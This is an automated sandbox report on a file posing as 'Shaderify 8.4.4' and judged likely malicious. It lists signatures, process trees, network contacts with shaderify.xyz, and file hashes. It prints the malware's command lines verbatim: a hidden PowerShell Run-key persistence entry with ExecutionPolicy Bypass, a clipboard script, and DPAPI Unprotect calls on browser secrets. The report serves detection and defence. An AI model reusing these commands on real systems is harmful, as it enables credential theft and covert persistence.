Analysis Overview
SHA256
db11f713b75df9ffea554ca36aa4135d4e258198af482eb4e72f45b74141f14b
Threat Level: Likely malicious
The file Shaderify_8.4.4.rar was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Adds Run key to start application
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Program crash
Enumerates physical storage devices
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates processes with tasklist
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 09:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240508-en
Max time kernel
134s
Max time network
154s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\SHsCQhOwdefuZpv.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe"
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67C2.tmp" "c:\Users\Admin\AppData\Local\Temp\zyipflkp\CSC442EA518B586492B98A0FAB9AEB2D3.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1812 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2200 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.62.21.104.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\System.dll
| MD5 | 75ed96254fbf894e42058062b4b4f0d1 |
| SHA1 | 996503f1383b49021eb3427bc28d13b5bbd11977 |
| SHA256 | a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7 |
| SHA512 | 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4 |
C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\nsis7z.dll
| MD5 | c6a070b3e68b292bb0efc9b26e85e9cc |
| SHA1 | 5a922b96eda6595a68fd0a9051236162ff2e2ada |
| SHA256 | 66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b |
| SHA512 | 8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8 |
C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\StdUtils.dll
| MD5 | 33b4e69e7835e18b9437623367dd1787 |
| SHA1 | 53afa03edaf931abdc2d828e5a2c89ad573d926c |
| SHA256 | 72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae |
| SHA512 | ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\ffmpeg.dll
| MD5 | eabfc10d56cb44a86493cb2f8ca7aab2 |
| SHA1 | 09d7e87f43527333cd021329d6c2f4e8bd8ddab5 |
| SHA256 | 42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6 |
| SHA512 | ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\icudtl.dat
| MD5 | ad2988770b8cb3281a28783ad833a201 |
| SHA1 | 94b7586ee187d9b58405485f4c551b55615f11b5 |
| SHA256 | df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108 |
| SHA512 | f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\v8_context_snapshot.bin
| MD5 | c2208c06c8ff81bca3c092cc42b8df1b |
| SHA1 | f7b9faa9ba0e72d062f68642a02cc8f3fed49910 |
| SHA256 | 4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3 |
| SHA512 | 6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources\app.asar
| MD5 | e95d6f8d09a92e654aadf7a4117550cf |
| SHA1 | 8d1b84e9f8fae63fe5b598bdb767d1c062bf8ffe |
| SHA256 | 781877bb7bbe002e7dacbadc65241df8ae5842b8db297f61c8786fb8e7bab09b |
| SHA512 | 517c6e2a76a52880a08c18a0ea6201fdff385ed7485b462711eacf21dc32bf446539dc297c2517e9b049e0d9c3c5e1ea99ead5804ff3d90c728cf293e5589d2f |
C:\Users\Admin\AppData\Local\Temp\09af70a9-862f-4d0a-89c6-5ab85ea5bb83.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3jjdbmk.fpn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5016-182-0x000001D1F68C0000-0x000001D1F68E2000-memory.dmp
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.cmdline
| MD5 | f3e706210daeebba6f59d0874c753703 |
| SHA1 | 864f54feb589cf24ba69a0150941b7199b09f977 |
| SHA256 | 24643f87d81dce65142b56f13f818c2d41a72d7b107da21c66ce18fd7f013a1f |
| SHA512 | 14152fac106302c8e1b11ee2699f1e7437bd519a993048c2379b64113845baf57918e0cfbab787f5b5c88679011fe66f50478392b1d27ccb004e8ec420159fef |
\??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\CSC442EA518B586492B98A0FAB9AEB2D3.TMP
| MD5 | e5821ce688f3aed0b2468931775a2f2a |
| SHA1 | 7a3e896eb39287e3b455f05eae33e179cc0b5d81 |
| SHA256 | c113b69c698b779ee3075aa798a56f8c525eb7c791bba4071c898af6081e9e8d |
| SHA512 | d4229d6c161eae666eeae18849aa09476df6ef019a76d2ddbf9172e6e6595e8fb33125175a35423ecf2fcf4fbf88d2d1a1754440a088877e6055f7442cb21191 |
C:\Users\Admin\AppData\Local\Temp\RES67C2.tmp
| MD5 | ab545f8c3e530deeab49bae1185a7cc4 |
| SHA1 | 5f5a853684e7bab4084ce1eaa581d4aa6503d913 |
| SHA256 | 6108e7cce3de3727da00080164f61d375e726e83cb4a60d116922916f5414d33 |
| SHA512 | afea1426ebe23d9327a7e2bc7b136e8dfefcf074c7000fae4412904f697afc1dacfd4af273bd263807bf6449f82c616ab9cd4ecbc85313a0641b69c4110d0ddd |
C:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.dll
| MD5 | 29a18389399044ccdc4150bfbccae7a5 |
| SHA1 | d3df3ed73c9583ebe50d3abc283f291a7488a093 |
| SHA256 | f9166045d42e1306b7c4dd84bd4261455bc714744ff2b65ceb8dfa5c2638b997 |
| SHA512 | 425a85d4be9626ad50501cdf47797c3bbf52f17d7bb71cdee7fbc3948205edf69259fdeb17819af7b9cac55f2cd2d7b727bf603a2d1b6b9e2f9baf8e5a53754b |
memory/5016-198-0x000001D1DC3E0000-0x000001D1DC3E8000-memory.dmp
memory/1240-210-0x00000271FC650000-0x00000271FC6A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c3d0e052ba84a5a94a12f82b5523b45e |
| SHA1 | 18c9412da40f1d565c47dc150f782672a8913baa |
| SHA256 | 0937d02e49f29b26b70ae49a9709208b79a25cb2b927251e5ef2cce71942638d |
| SHA512 | 78a4c052734d4540e190e37c674302d1a234c9d83e0761b1337241519685dbe486b65a8d58919bc2e166c8a58395895fd1385b8a47f5fed4506dbf132ddfc607 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_100_percent.pak
| MD5 | 06baf0ad34e0231bd76651203dba8326 |
| SHA1 | a5f99ecdcc06dec9d7f9ce0a8c66e46969117391 |
| SHA256 | 5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189 |
| SHA512 | aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_200_percent.pak
| MD5 | 57c27201e7cd33471da7ec205fe9973c |
| SHA1 | a8e7bce09c4cbdae2797611b2be8aeb5491036f9 |
| SHA256 | dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b |
| SHA512 | 57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources.pak
| MD5 | d13873f6fb051266deb3599b14535806 |
| SHA1 | 143782c0ce5a5773ae0aae7a22377c8a6d18a5b2 |
| SHA256 | 7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506 |
| SHA512 | 1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\locales\en-US.pak
| MD5 | bd8f7b719110342b7cefb16ddd05ec55 |
| SHA1 | 82a79aeaa1dd4b1464b67053ba1766a4498c13e7 |
| SHA256 | d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de |
| SHA512 | 7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e |
memory/736-241-0x00007FFC83400000-0x00007FFC83401000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\D3DCompiler_47.dll
| MD5 | 7641e39b7da4077084d2afe7c31032e0 |
| SHA1 | 2256644f69435ff2fee76deb04d918083960d1eb |
| SHA256 | 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47 |
| SHA512 | 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libglesv2.dll
| MD5 | bc45db0195aa369cc3c572e4e9eefc7e |
| SHA1 | b880ca4933656be52f027028af5ef8a3b7e07e97 |
| SHA256 | a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10 |
| SHA512 | dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libegl.dll
| MD5 | 660a9ae1282e6205fc0a51e64470eb5b |
| SHA1 | f91a9c9559f51a8f33a552f0145ed9e706909de8 |
| SHA256 | f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85 |
| SHA512 | 20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240226-en
Max time kernel
132s
Max time network
168s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
